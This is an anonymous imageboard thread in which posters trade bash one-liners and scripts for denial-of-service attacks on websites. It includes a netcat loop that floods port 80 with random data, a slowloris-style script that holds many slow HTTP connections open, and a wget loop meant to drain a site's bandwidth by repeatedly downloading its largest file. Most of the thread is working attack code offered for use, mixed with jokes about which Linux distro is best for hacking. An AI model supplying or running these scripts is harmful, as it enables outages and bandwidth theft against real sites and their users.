Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

dos with nc

Name: Anonymous 2013-09-29 4:23

How effective is this method of DOSing a website?

#!/bin/bash

while true; do
              nc [redacted] 80 </dev/urandom >/dev/null &
done

Name: Anonymous 2013-09-29 4:26

>>1 Where are your multiple VPN connections?

Also, yes(1) is better.

Name: Anonymous 2013-09-29 5:16

SHITloris

host="$1"
port="$2"
timeout="$3"
times="$4"
req=$'GET / HTTP/1.0\r\n\r\n'

for i in `seq 1 $times`; do
 for ((i=0; i<${#req}; i++)); do
  echo -n "${req:$i:1}"
  sleep "$timeout"
 done | nc "$host" "$port" &
done

wait

Name: Anonymous 2013-09-29 5:41

>>2
I don't have multiple VPN connections. My only computer is a Thinkpad T430.

Name: Anonymous 2013-09-29 7:01

Gentoo is a operating system optimized for DOSing and hacking in general. I suggest you install it and try it out.

Name: Anonymous 2013-09-29 7:40

>>5
NO! This is backtrack. Backtrack is the distro for Dosing and hacking!

Gentoo is for hacking in the real original meaning of hacking.

Its for people who want to learn from their OS. With Gentoo Linux you can see all the source code in front of you. Or like they say "with Ubuntu you learn Ubuntu but with Gentoo you learn Linux"

Name: Anonymous 2013-09-29 17:19


while true
    do wget "$1" -O /dev/null
done


Where the first arguement given on the command line ($1) is a url to the biggest file you can find on their site, a large image would be a good choice. Then just keep running it multiple times.

It would be a good idea to put their domain in /etc/hosts so you don't waste time with the DNS lookup.

This is effectively just stealing bandwidth, you can steal as much upload bandwidth from them as you have download bandwidth. It's only a minor annoyance unless you have a fuck load of bandwidth or a bunch of people doing it to the point where it outweighs their upload bandwidth.

Name: Anonymous 2013-09-29 18:50

ping [redacted]

Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List